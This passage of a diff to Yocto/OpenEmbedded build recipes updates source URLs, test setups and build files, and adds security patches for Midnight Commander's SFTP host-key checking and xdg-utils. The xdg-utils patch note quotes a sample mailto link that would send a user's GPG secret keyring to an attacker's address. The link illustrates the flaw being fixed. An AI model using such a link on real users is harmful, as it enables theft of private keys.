+- libssh2_hostkey_hash (sftpfs_super->session, LIBSSH2_HOSTKEY_HASH_SHA1);
++ if (!sftpfs_process_known_host (super, mcerror))
++ return (-1);
+
+ if (!sftpfs_recognize_auth_types (super))
+ {
+@@ -538,7 +942,13 @@ sftpfs_close_connection (struct vfs_s_super *super, const char *shutdown_message
+ sftpfs_super->agent = NULL;
+ }
+
+- sftpfs_super->fingerprint = NULL;
++ if (sftpfs_super->known_hosts != NULL)
++ {
++ libssh2_knownhost_free (sftpfs_super->known_hosts);
++ sftpfs_super->known_hosts = NULL;
++ }
++
++ MC_PTR_FREE (sftpfs_super->known_hosts_file);
+
+ if (sftpfs_super->session != NULL)
+ {
+diff --git a/src/vfs/sftpfs/internal.h b/src/vfs/sftpfs/internal.h
+index 5616fb8990..643ce5e3cc 100644
+--- a/src/vfs/sftpfs/internal.h
++++ b/src/vfs/sftpfs/internal.h
+@@ -42,6 +42,9 @@ typedef struct
+ sftpfs_auth_type_t auth_type;
+ sftpfs_auth_type_t config_auth_type;
+
++ LIBSSH2_KNOWNHOSTS *known_hosts;
++ char *known_hosts_file;
++
+ LIBSSH2_SESSION *session;
+ LIBSSH2_SFTP *sftp_session;
+
+@@ -51,7 +54,7 @@ typedef struct
+ char *privkey;
+
+ int socket_handle;
+- const char *fingerprint;
++ const char *ip_address;
+ vfs_path_element_t *original_connection_info;
+ } sftpfs_super_t;
+
diff --git a/meta/recipes-extended/mc/mc_4.8.26.bb b/meta/recipes-extended/mc/mc_4.8.26.bb
index 5c5e6790d8b..6bc7e6e8e15 100644
--- a/meta/recipes-extended/mc/mc_4.8.26.bb
+++ b/meta/recipes-extended/mc/mc_4.8.26.bb
@@ -11,6 +11,7 @@ RRECOMMENDS_${PN} = "ncurses-terminfo"
SRC_URI = "http://www.midnight-commander.org/downloads/${BPN}-${PV}.tar.bz2 \
file://0001-mc-replace-perl-w-with-use-warnings.patch \
file://nomandate.patch \
+ file://CVE-2021-36370.patch \
"
SRC_URI[sha256sum] = "9d6358d0a351a455a1410aab57f33b6b48b0fcf31344b9a10b0ff497595979d1"
diff --git a/meta/recipes-extended/net-tools/net-tools_2.10.bb b/meta/recipes-extended/net-tools/net-tools_2.10.bb
index de4a7159714..2dafe963562 100644
--- a/meta/recipes-extended/net-tools/net-tools_2.10.bb
+++ b/meta/recipes-extended/net-tools/net-tools_2.10.bb
@@ -7,7 +7,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263 \
file://ifconfig.c;beginline=11;endline=15;md5=d1ca372080ad5401e23ca0afc35cf9ba"
SRCREV = "80d7b95067f1f22fece9537dea6dff53081f4886"
-SRC_URI = "git://git.code.sf.net/p/net-tools/code;protocol=https \
+SRC_URI = "git://git.code.sf.net/p/net-tools/code;protocol=https;branch=master \
file://net-tools-config.h \
file://net-tools-config.make \
file://Add_missing_headers.patch \
diff --git a/meta/recipes-extended/newt/libnewt_0.52.21.bb b/meta/recipes-extended/newt/libnewt_0.52.21.bb
index 88b4cf4a03e..3d35a17c92e 100644
--- a/meta/recipes-extended/newt/libnewt_0.52.21.bb
+++ b/meta/recipes-extended/newt/libnewt_0.52.21.bb
@@ -29,7 +29,7 @@ SRC_URI[sha256sum] = "265eb46b55d7eaeb887fca7a1d51fe115658882dfe148164b6c49fccac
S = "${WORKDIR}/newt-${PV}"
-inherit autotools-brokensep python3native python3-dir
+inherit autotools-brokensep python3native python3-dir python3targetconfig
EXTRA_OECONF = "--without-tcl --with-python"
diff --git a/meta/recipes-extended/parted/files/check-vfat.patch b/meta/recipes-extended/parted/files/check-vfat.patch
new file mode 100644
index 00000000000..c64130a4e2a
--- /dev/null
+++ b/meta/recipes-extended/parted/files/check-vfat.patch
@@ -0,0 +1,51 @@
+Add checks for both mkfs.vfat and the vfat file system in the kernel before
+running tests.
+
+Upstream-Status: Pending
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+diff --git a/tests/t-lib-helpers.sh b/tests/t-lib-helpers.sh
+index 4c6c75f..2cc7577 100644
+--- a/tests/t-lib-helpers.sh
++++ b/tests/t-lib-helpers.sh
+@@ -418,3 +418,13 @@ require_64bit_()
+ ;;
+ esac
+ }
++
++# Check if the specified filesystem is either built into the kernel, or can be loaded
++# as a module
++# Usage: has_filesystem vfat
++# Ruturns 0 if the filesystem is available, otherwise skips the test
++require_filesystem_()
++{
++ grep -q $1 /proc/filesystems && return 0
++ modprobe --quiet --dry-run $1 || skip_ "this test requires kernel support for $1"
++}
+diff --git a/tests/t1100-busy-label.sh b/tests/t1100-busy-label.sh
+index f1a13df..0f47b08 100755
+--- a/tests/t1100-busy-label.sh
++++ b/tests/t1100-busy-label.sh
+@@ -19,6 +19,9 @@
+ . "${srcdir=.}/init.sh"; path_prepend_ ../parted
+ require_root_
+ require_scsi_debug_module_
++require_fat_
++require_filesystem_ vfat
++
+ ss=$sector_size_
+
+ scsi_debug_setup_ sector_size=$ss dev_size_mb=90 > dev-name ||
+diff --git a/tests/t1101-busy-partition.sh b/tests/t1101-busy-partition.sh
+index e35e6f0..c813848 100755
+--- a/tests/t1101-busy-partition.sh
++++ b/tests/t1101-busy-partition.sh
+@@ -22,6 +22,8 @@ test "$VERBOSE" = yes && parted --version
+
+ require_root_
+ require_scsi_debug_module_
++require_fat_
++require_filesystem_ vfat
+
+ # create memory-backed device
+ scsi_debug_setup_ dev_size_mb=80 > dev-name ||
diff --git a/meta/recipes-extended/parted/files/run-ptest b/meta/recipes-extended/parted/files/run-ptest
index 374f1bfbc9b..c3d6fca3391 100644
--- a/meta/recipes-extended/parted/files/run-ptest
+++ b/meta/recipes-extended/parted/files/run-ptest
@@ -2,6 +2,6 @@
mkdir -p /etc/udev/mount.blacklist.d
echo /dev/sda1 >> /etc/udev/mount.blacklist.d/parted-tmp
-rm -f *.log
+rm -f tests/*.log
make -C tests test-suite.log
rm /etc/udev/mount.blacklist.d/parted-tmp
diff --git a/meta/recipes-extended/parted/parted_3.4.bb b/meta/recipes-extended/parted/parted_3.4.bb
index c15f5aeb0b2..4260f3a0d42 100644
--- a/meta/recipes-extended/parted/parted_3.4.bb
+++ b/meta/recipes-extended/parted/parted_3.4.bb
@@ -11,6 +11,7 @@ SRC_URI = "${GNU_MIRROR}/parted/parted-${PV}.tar.xz \
file://fix-doc-mandir.patch \
file://0002-libparted_fs_resize-link-against-libuuid-explicitly-.patch \
file://run-ptest \
+ file://check-vfat.patch \
"
SRC_URI[md5sum] = "357d19387c6e7bc4a8a90fe2d015fe80"
@@ -35,10 +36,13 @@ do_install_ptest() {
cp ${S}/build-aux/test-driver $t/build-aux/
cp -r ${S}/tests $t
cp ${B}/tests/Makefile $t/tests/
+ mkdir $t/lib
+ cp ${B}/lib/config.h $t/lib
sed -i "s|^VERSION.*|VERSION = ${PV}|g" $t/tests/Makefile
sed -i "s|^srcdir =.*|srcdir = \.|g" $t/tests/Makefile
sed -i "s|^abs_srcdir =.*|abs_srcdir = \.|g" $t/tests/Makefile
- sed -i "s|^abs_top_srcdir =.*|abs_top_srcdir = \.\.|g" $t/tests/Makefile
+ sed -i "s|^abs_top_srcdir =.*|abs_top_srcdir = "${PTEST_PATH}"|g" $t/tests/Makefile
+ sed -i "s|^abs_top_builddir =.*|abs_top_builddir = "${PTEST_PATH}"|g" $t/tests/Makefile
sed -i "s|^Makefile:.*|Makefile:|g" $t/tests/Makefile
sed -i "/^BUILDINFO.*$/d" $t/tests/Makefile
for i in print-align print-max print-flags dup-clobber duplicate fs-resize; \
@@ -47,8 +51,8 @@ do_install_ptest() {
sed -e 's| ../parted||' -i $t/tests/*.sh
}
-RDEPENDS_${PN}-ptest = "bash coreutils perl util-linux-losetup python3 make gawk e2fsprogs-mke2fs python3-core"
-RRECOMMENDS_${PN}-ptest = "kernel-module-scsi-debug"
+RDEPENDS_${PN}-ptest = "bash coreutils perl util-linux-losetup util-linux-mkswap python3 make gawk e2fsprogs-mke2fs e2fsprogs-tune2fs python3-core dosfstools"
+RRECOMMENDS_${PN}-ptest += "kernel-module-scsi-debug kernel-module-loop kernel-module-vfat"
RDEPENDS_${PN}-ptest_append_libc-glibc = "\
glibc-utils \
locale-base-en-us \
diff --git a/meta/recipes-extended/procps/procps_3.3.17.bb b/meta/recipes-extended/procps/procps_3.3.17.bb
index c74a901d9ae..9fd3db196d2 100644
--- a/meta/recipes-extended/procps/procps_3.3.17.bb
+++ b/meta/recipes-extended/procps/procps_3.3.17.bb
@@ -12,7 +12,7 @@ DEPENDS = "ncurses"
inherit autotools gettext pkgconfig update-alternatives
-SRC_URI = "git://gitlab.com/procps-ng/procps.git;protocol=https \
+SRC_URI = "git://gitlab.com/procps-ng/procps.git;protocol=https;branch=master \
file://sysctl.conf \
file://0001-w.c-correct-musl-builds.patch \
file://0002-proc-escape.c-add-missing-include.patch \
diff --git a/meta/recipes-extended/psmisc/psmisc_23.4.bb b/meta/recipes-extended/psmisc/psmisc_23.4.bb
index 894443f4ef6..89fe8a709c3 100644
--- a/meta/recipes-extended/psmisc/psmisc_23.4.bb
+++ b/meta/recipes-extended/psmisc/psmisc_23.4.bb
@@ -2,7 +2,7 @@ require psmisc.inc
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3"
-SRC_URI = "git://gitlab.com/psmisc/psmisc.git;protocol=https \
+SRC_URI = "git://gitlab.com/psmisc/psmisc.git;protocol=https;branch=master \
file://0001-Use-UINTPTR_MAX-instead-of-__WORDSIZE.patch \
"
SRCREV = "5fab6b7ab385080f1db725d6803136ec1841a15f"
diff --git a/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb b/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb
index 5aff2b56a6c..ad392138b51 100644
--- a/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb
+++ b/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb
@@ -19,7 +19,7 @@ PV = "1.4.2"
SRCREV = "6f54e54455c073d08a56ea627c6cd2355a40eb53"
-SRC_URI = "git://github.com/thkukuk/${BPN} \
+SRC_URI = "git://github.com/thkukuk/${BPN};branch=master;protocol=https \
file://0001-Use-cross-compiled-rpcgen.patch \
"
diff --git a/meta/recipes-extended/stress-ng/stress-ng/no_daddr_t.patch b/meta/recipes-extended/stress-ng/stress-ng/no_daddr_t.patch
deleted file mode 100644
index dba4494b913..00000000000
--- a/meta/recipes-extended/stress-ng/stress-ng/no_daddr_t.patch
+++ /dev/null
@@ -1,32 +0,0 @@
-From 55e11765af2bdc8adfac87dab1fb2682f7e6c236 Mon Sep 17 00:00:00 2001
-From: Khem Raj <raj.khem@gmail.com>
-Date: Tue, 9 Jun 2020 22:10:28 -0700
-Subject: [PATCH] Define daddr_t if __DADDR_T_TYPE is not defined
-
-glibc defined daddr_t but musl does not, ideally it should not be used
-and simple int type is enough. However, its better to leave glibc behavior
-as it is and only define it to int if daddr_t is not provided by libc
-
-Upstream-Status: Pending
-
-Signed-off-by: Khem Raj <raj.khem@gmail.com>
-
----
- stress-ng.h | 4 ++++
- 1 file changed, 4 insertions(+)
-
-diff --git a/stress-ng.h b/stress-ng.h
-index 1a66293..802dc25 100644
---- a/stress-ng.h
-+++ b/stress-ng.h
-@@ -3763,6 +3763,10 @@ struct shim_statx {
- uint64_t __spare2[14];
- };
-
-+#ifndef __DADDR_T_TYPE
-+typedef int daddr_t;
-+#endif
-+
- /* old ustat struct */
- struct shim_ustat {
- #if defined(HAVE_DADDR_T)
diff --git a/meta/recipes-extended/stress-ng/stress-ng_0.12.05.bb b/meta/recipes-extended/stress-ng/stress-ng_0.12.05.bb
index eb6bdb4a819..3770ba9ae17 100644
--- a/meta/recipes-extended/stress-ng/stress-ng_0.12.05.bb
+++ b/meta/recipes-extended/stress-ng/stress-ng_0.12.05.bb
@@ -7,7 +7,6 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
SRC_URI = "https://kernel.ubuntu.com/~cking/tarballs/${BPN}/${BP}.tar.xz \
file://0001-Do-not-preserve-ownership-when-installing-example-jo.patch \
- file://no_daddr_t.patch \
"
SRC_URI[sha256sum] = "af7779aee38e6d94726ed7d5cf36384a64d50c86e42fff89c141d8609913f425"
@@ -24,4 +23,3 @@ do_install() {
oe_runmake DESTDIR=${D} install
ln -s stress-ng ${D}${bindir}/stress
}
-
diff --git a/meta/recipes-extended/sysklogd/sysklogd_2.2.2.bb b/meta/recipes-extended/sysklogd/sysklogd_2.2.2.bb
index 5dfeca53261..01a079f041f 100644
--- a/meta/recipes-extended/sysklogd/sysklogd_2.2.2.bb
+++ b/meta/recipes-extended/sysklogd/sysklogd_2.2.2.bb
@@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=5b4be4b2549338526758ef479c040943 \
inherit update-rc.d update-alternatives systemd autotools
-SRC_URI = "git://github.com/troglobit/sysklogd.git;nobranch=1 \
+SRC_URI = "git://github.com/troglobit/sysklogd.git;nobranch=1;protocol=https \
file://sysklogd \
"
diff --git a/meta/recipes-extended/tar/tar_1.34.bb b/meta/recipes-extended/tar/tar_1.34.bb
index af04919c414..f41e5b33d4d 100644
--- a/meta/recipes-extended/tar/tar_1.34.bb
+++ b/meta/recipes-extended/tar/tar_1.34.bb
@@ -61,3 +61,7 @@ PROVIDES_append_class-native = " tar-replacement-native"
NATIVE_PACKAGE_PATH_SUFFIX = "/${PN}"
BBCLASSEXTEND = "native nativesdk"
+
+# These are both specific to the NPM package node-tar
+CVE_CHECK_WHITELIST += "CVE-2021-32803 CVE-2021-32804"
+CVE_CHECK_WHITELIST += "CVE-2021-37701 CVE-2021-37712 CVE-2021-37713"
diff --git a/meta/recipes-extended/timezone/timezone.inc b/meta/recipes-extended/timezone/timezone.inc
index a89560b424f..5c19e9a7f49 100644
--- a/meta/recipes-extended/timezone/timezone.inc
+++ b/meta/recipes-extended/timezone/timezone.inc
@@ -6,7 +6,7 @@ SECTION = "base"
LICENSE = "PD & BSD & BSD-3-Clause"
LIC_FILES_CHKSUM = "file://LICENSE;md5=c679c9d6b02bc2757b3eaf8f53c43fba"
-PV = "2021a"
+PV = "2021d"
SRC_URI =" http://www.iana.org/time-zones/repository/releases/tzcode${PV}.tar.gz;name=tzcode \
http://www.iana.org/time-zones/repository/releases/tzdata${PV}.tar.gz;name=tzdata \
@@ -14,5 +14,6 @@ SRC_URI =" http://www.iana.org/time-zones/repository/releases/tzcode${PV}.tar.gz
UPSTREAM_CHECK_URI = "http://www.iana.org/time-zones"
-SRC_URI[tzcode.sha256sum] = "eb46bfa124b5b6bd13d61a609bfde8351bd192894708d33aa06e5c1e255802d0"
-SRC_URI[tzdata.sha256sum] = "39e7d2ba08c68cbaefc8de3227aab0dec2521be8042cf56855f7dc3a9fb14e08"
+SRC_URI[tzcode.sha256sum] = "ed0d02be79b54f4449ba1f239aeaf9315da490bf32f401d302dcbba4921f591d"
+SRC_URI[tzdata.sha256sum] = "d7c188a2b33d4a3c25ee4a9fdc68c1ff462bfdb302cf41343d84ca5942dbddf6"
+
diff --git a/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch b/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch
new file mode 100644
index 00000000000..948b9e22e93
--- /dev/null
+++ b/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch
@@ -0,0 +1,58 @@
+From 1f199813e0eb0246f63b54e9e154970e609575af Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= <joerg@thalheim.io>
+Date: Tue, 18 Aug 2020 16:52:24 +0100
+Subject: [PATCH] xdg-email: remove attachment handling from mailto
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This allows attacker to extract secrets from users:
+
+mailto:sid@evil.com?attach=/.gnupg/secring.gpg
+
+See also https://bugzilla.mozilla.org/show_bug.cgi?id=1613425
+and https://gitlab.freedesktop.org/xdg/xdg-utils/-/issues/177
+
+Signed-off-by: Jörg Thalheim <joerg@thalheim.io>
+---
+ scripts/xdg-email.in | 7 +------
+ 1 file changed, 1 insertion(+), 6 deletions(-)
+
+Upstream-Status: Backport
+CVE: CVE-2020-27748
+
+diff --git a/scripts/xdg-email.in b/scripts/xdg-email.in
+index 6db58ad..5d2f4f3 100644
+--- a/scripts/xdg-email.in
++++ b/scripts/xdg-email.in
+@@ -32,7 +32,7 @@ _USAGE
+
+ run_thunderbird()
+ {
+- local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY ATTACH
++ local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY
+ THUNDERBIRD="$1"
+ MAILTO=$(echo "$2" | sed 's/^mailto://')
+ echo "$MAILTO" | grep -qs "^?"
+@@ -48,7 +48,6 @@ run_thunderbird()
+ BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
+ SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1)
+ BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1)
+- ATTACH=$(/bin/echo -e $(echo "$MAILTO" | grep '^attach=' | sed 's/^attach=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }' | sed 's/,$//'))
+
+ if [ -z "$TO" ] ; then
+ NEWMAILTO=
+@@ -68,10 +67,6 @@ run_thunderbird()
+ NEWMAILTO="${NEWMAILTO},$BODY"
+ fi
+
+- if [ -n "$ATTACH" ] ; then
+- NEWMAILTO="${NEWMAILTO},attachment='${ATTACH}'"
+- fi
+-
+ NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//')
+ DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\""
+ "$THUNDERBIRD" -compose "$NEWMAILTO"
+--
+GitLab
+
diff --git a/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb b/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb
index d371c5c28ce..41b74b85988 100644
--- a/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb
+++ b/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb
@@ -20,6 +20,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=a5367a90934098d6b05af3b746405014"
SRC_URI = "https://portland.freedesktop.org/download/${BPN}-${PV}.tar.gz \
file://0001-Reinstate-xdg-terminal.patch \
file://0001-Don-t-build-the-in-script-manual.patch \
+ file://1f199813e0eb0246f63b54e9e154970e609575af.patch \
"
SRC_URI[md5sum] = "902042508b626027a3709d105f0b63ff"
diff --git a/meta/recipes-extended/xinetd/xinetd_2.3.15.4.bb b/meta/recipes-extended/xinetd/xinetd_2.3.15.4.bb
index 69d5b2f83b7..c6d356d227f 100644
--- a/meta/recipes-extended/xinetd/xinetd_2.3.15.4.bb
+++ b/meta/recipes-extended/xinetd/xinetd_2.3.15.4.bb
@@ -9,7 +9,7 @@ LIC_FILES_CHKSUM = "file://COPYRIGHT;md5=55c5fdf02cfcca3fc9621b6f2ceae10f"
UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+(\.\d+)+)"
-SRC_URI = "git://github.com/openSUSE/xinetd.git;protocol=https \
+SRC_URI = "git://github.com/openSUSE/xinetd.git;protocol=https;branch=master \
file://xinetd.init \
file://xinetd.default \
file://xinetd.service \
diff --git a/meta/recipes-extended/zstd/zstd_1.4.9.bb b/meta/recipes-extended/zstd/zstd_1.4.9.bb
index b86fdf8b2d5..b648c840935 100644
--- a/meta/recipes-extended/zstd/zstd_1.4.9.bb
+++ b/meta/recipes-extended/zstd/zstd_1.4.9.bb
@@ -9,13 +9,15 @@ LICENSE = "BSD-3-Clause & GPLv2"
LIC_FILES_CHKSUM = "file://LICENSE;md5=c7f0b161edbe52f5f345a3d1311d0b32 \
file://COPYING;md5=39bba7d2cf0ba1036f2a6e2be52fe3f0"
-SRC_URI = "git://github.com/facebook/zstd.git;branch=release \
+SRC_URI = "git://github.com/facebook/zstd.git;branch=release;protocol=https \
file://0001-Makefile-sort-all-wildcard-file-list-expansions.patch \
"
SRCREV = "e4558ffd1dc49399faf4ee5d85abed4386b4dcf5"
UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>\d+(\.\d+)+)"
+CVE_PRODUCT = "zstandard"
+
S = "${WORKDIR}/git"
PACKAGECONFIG ??= ""
diff --git a/meta/recipes-gnome/gobject-introspection/gobject-introspection_1.66.1.bb b/meta/recipes-gnome/gobject-introspection/gobject-introspection_1.66.1.bb
index ebac8d3a432..8b752f7e7d0 100644
--- a/meta/recipes-gnome/gobject-introspection/gobject-introspection_1.66.1.bb
+++ b/meta/recipes-gnome/gobject-introspection/gobject-introspection_1.66.1.bb
@@ -6,7 +6,7 @@ generation for bindings, API verification and documentation generation."
HOMEPAGE = "https://wiki.gnome.org/action/show/Projects/GObjectIntrospection"
BUGTRACKER = "https://gitlab.gnome.org/GNOME/gobject-introspection/issues"
SECTION = "libs"
-LICENSE = "LGPLv2+ & GPLv2+"
+LICENSE = "LGPLv2+ & GPLv2+ & MIT"
LIC_FILES_CHKSUM = "file://COPYING;md5=c434e8128a68bedd59b80b2ac1eb1c4a \
file://tools/compiler.c;endline=20;md5=fc5007fc20022720e6c0b0cdde41fabd \
file://giscanner/sourcescanner.c;endline=22;md5=194d6e0c1d00662f32d030ce44de8d39 \
@@ -94,7 +94,7 @@ EOF
# from the target sysroot.
cat > ${B}/g-ir-scanner-wrapper << EOF
#!/bin/sh
-# This prevents g-ir-scanner from writing cache data to $HOME
+# This prevents g-ir-scanner from writing cache data to user's HOME dir
export GI_SCANNER_DISABLE_CACHE=1
g-ir-scanner --lib-dirs-envvar=GIR_EXTRA_LIBS_PATH --use-binary-wrapper=${STAGING_BINDIR}/g-ir-scanner-qemuwrapper --use-ldd-wrapper=${STAGING_BINDIR}/g-ir-scanner-lddwrapper --add-include-path=${STAGING_DATADIR}/gir-1.0 --add-include-path=${STAGING_LIBDIR}/gir-1.0 "\$@"
diff --git a/meta/recipes-gnome/hicolor-icon-theme/hicolor-icon-theme_0.17.bb b/meta/recipes-gnome/hicolor-icon-theme/hicolor-icon-theme_0.17.bb
index 74e34305284..d70265ee505 100644
--- a/meta/recipes-gnome/hicolor-icon-theme/hicolor-icon-theme_0.17.bb
+++ b/meta/recipes-gnome/hicolor-icon-theme/hicolor-icon-theme_0.17.bb
@@ -16,3 +16,7 @@ inherit allarch autotools
FILES_${PN} += "${datadir}/icons"
BBCLASSEXTEND = "native nativesdk"
+
+# remove at next version upgrade or when output changes
+PR = "r1"
+HASHEQUIV_HASH_VERSION .= ".1"
diff --git a/meta/recipes-gnome/libhandy/libhandy_1.2.0.bb b/meta/recipes-gnome/libhandy/libhandy_1.2.0.bb
index 1e37feb20a2..f39cbdca5a7 100644
--- a/meta/recipes-gnome/libhandy/libhandy_1.2.0.bb
+++ b/meta/recipes-gnome/libhandy/libhandy_1.2.0.bb
@@ -9,7 +9,7 @@ BUGTRACKER = "https://gitlab.gnome.org/GNOME/libhandy/-/issues"
LICENSE = "LGPLv2.1"
LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c"
-SRC_URI = "git://gitlab.gnome.org/GNOME/libhandy.git;protocol=https"
+SRC_URI = "git://gitlab.gnome.org/GNOME/libhandy.git;protocol=https;branch=master"
SRCREV = "7b38a860ffcec6c2ad28153358cc3d037ddb618f"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-gnome/libportal/libportal_0.3.bb b/meta/recipes-gnome/libportal/libportal_0.3.bb
index bc4ff3784c6..c24a794fc48 100644
--- a/meta/recipes-gnome/libportal/libportal_0.3.bb
+++ b/meta/recipes-gnome/libportal/libportal_0.3.bb
@@ -6,7 +6,7 @@ BUGTRACKER = "https://github.com/flatpak/libportal/issues"
LICENSE = "LGPLv2.1"
LIC_FILES_CHKSUM = "file://COPYING;md5=5f30f0716dfdd0d91eb439ebec522ec2"
-SRC_URI = "git://github.com/flatpak/${BPN}.git;protocol=https"
+SRC_URI = "git://github.com/flatpak/${BPN}.git;protocol=https;branch=master"
SRCREV = "a609e06d0c4adc5c510cf9ac7b060db3d368e78f"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-graphics/glew/glew/0001-Fix-build-race-in-Makefile.patch b/meta/recipes-graphics/glew/glew/0001-Fix-build-race-in-Makefile.patch
new file mode 100644
index 00000000000..7edcfe8de8b
--- /dev/null
+++ b/meta/recipes-graphics/glew/glew/0001-Fix-build-race-in-Makefile.patch
@@ -0,0 +1,56 @@
+Upstream-Status: Submitted [https://github.com/nigels-com/glew/pull/311]
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+From 0ce0a85597db48a2fca619bd95e34af091e54ae8 Mon Sep 17 00:00:00 2001
+From: Ross Burton <ross.burton@arm.com>
+Date: Thu, 22 Jul 2021 16:31:11 +0100
+Subject: [PATCH] Fix build race in Makefile
+
+The current rule for the binaries is:
+
+glew.bin: glew.lib bin bin/$(GLEWINFO.BIN) bin/$(VISUALINFO.BIN)
+
+In parallel builds, all of those targets happen at the same time. This
+means that 'bin' can happen *after* 'bin/$(GLEWINFO.BIN)', which is a
+problem as the 'bin' target's responsibility is to create the directory
+that the other target writes into.
+
+Solve this by not having a separate 'create directory' target which is
+fundamentally racy, and simply mkdir in each target which writes into it.
+---
+ Makefile | 9 ++++-----
+ 1 file changed, 4 insertions(+), 5 deletions(-)
+
+diff --git a/Makefile b/Makefile
+index d0e4614..04af44c 100644
+--- a/Makefile
++++ b/Makefile
+@@ -171,21 +171,20 @@ VISUALINFO.BIN.OBJ := $(VISUALINFO.BIN.OBJ:.c=.o)
+ # Don't build glewinfo or visualinfo for NaCL, yet.
+
+ ifneq ($(filter nacl%,$(SYSTEM)),)
+-glew.bin: glew.lib bin
++glew.bin: glew.lib
+ else
+-glew.bin: glew.lib bin bin/$(GLEWINFO.BIN) bin/$(VISUALINFO.BIN)
++glew.bin: glew.lib bin/$(GLEWINFO.BIN) bin/$(VISUALINFO.BIN)
+ endif
+
+-bin:
+- mkdir bin
+-
+ bin/$(GLEWINFO.BIN): $(GLEWINFO.BIN.OBJ) $(LIB.SHARED.DIR)/$(LIB.SHARED)
++ @mkdir -p $(dir $@)
+ $(CC) $(CFLAGS) -o $@ $(GLEWINFO.BIN.OBJ) $(BIN.LIBS)
+ ifneq ($(STRIP),)
+ $(STRIP) -x $@
+ endif
+
+ bin/$(VISUALINFO.BIN): $(VISUALINFO.BIN.OBJ) $(LIB.SHARED.DIR)/$(LIB.SHARED)
++ @mkdir -p $(dir $@)
+ $(CC) $(CFLAGS) -o $@ $(VISUALINFO.BIN.OBJ) $(BIN.LIBS)
+ ifneq ($(STRIP),)
+ $(STRIP) -x $@
+--
+2.25.1
+
diff --git a/meta/recipes-graphics/glew/glew/notempdir.patch b/meta/recipes-graphics/glew/glew/notempdir.patch
new file mode 100644
index 00000000000..8d79ce0cdf9
--- /dev/null
+++ b/meta/recipes-graphics/glew/glew/notempdir.patch
@@ -0,0 +1,19 @@
+We don't use the dist-* targets and hence DIST_DIR isn't used. The current code
+creates a new temp directory in /tmp/ for every invocation of make. Lets
+not do that.
+
+Upstream-Status: Pending [a revised version would be needed for upstream]
+Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
+
+Index: glew-2.2.0/Makefile
+===================================================================
+--- glew-2.2.0.orig/Makefile
++++ glew-2.2.0/Makefile
+@@ -56,7 +56,6 @@ DIST_SRC_ZIP ?= $(shell pwd)/$(DIST_NAME
+ DIST_SRC_TGZ ?= $(shell pwd)/$(DIST_NAME).tgz
+ DIST_WIN32 ?= $(shell pwd)/$(DIST_NAME)-win32.zip
+
+-DIST_DIR := $(shell mktemp -d /tmp/glew.XXXXXX)/$(DIST_NAME)
+
+ # To disable stripping of linked binaries either:
+ # - use STRIP= on gmake command-line
diff --git a/meta/recipes-graphics/glew/glew_2.2.0.bb b/meta/recipes-graphics/glew/glew_2.2.0.bb
index 8948444e085..d7a26a34381 100644
--- a/meta/recipes-graphics/glew/glew_2.2.0.bb
+++ b/meta/recipes-graphics/glew/glew_2.2.0.bb
@@ -6,6 +6,8 @@ LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=2ac251558de685c6b9478d89be3149c2"
SRC_URI = "${SOURCEFORGE_MIRROR}/project/glew/glew/${PV}/glew-${PV}.tgz \
+ file://0001-Fix-build-race-in-Makefile.patch \
+ file://notempdir.patch \
file://no-strip.patch"
SRC_URI[md5sum] = "3579164bccaef09e36c0af7f4fd5c7c7"
diff --git a/meta/recipes-graphics/glslang/glslang_11.2.0.bb b/meta/recipes-graphics/glslang/glslang_11.2.0.bb
index 902f7345f5f..e00f73ccb76 100644
--- a/meta/recipes-graphics/glslang/glslang_11.2.0.bb
+++ b/meta/recipes-graphics/glslang/glslang_11.2.0.bb
@@ -9,7 +9,7 @@ LICENSE = "BSD-3-Clause & BSD-2-Clause & MIT & Apache-2.0 & GPL-3-with-bison-exc
LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=c5ce49c0456e9b413b98a4368c378229"
SRCREV = "5421877c380d5f92c1965c7a94620dac861297dd"
-SRC_URI = "git://github.com/KhronosGroup/glslang.git;protocol=https \
+SRC_URI = "git://github.com/KhronosGroup/glslang.git;protocol=https;branch=master \
file://0001-generate-glslang-pkg-config.patch"
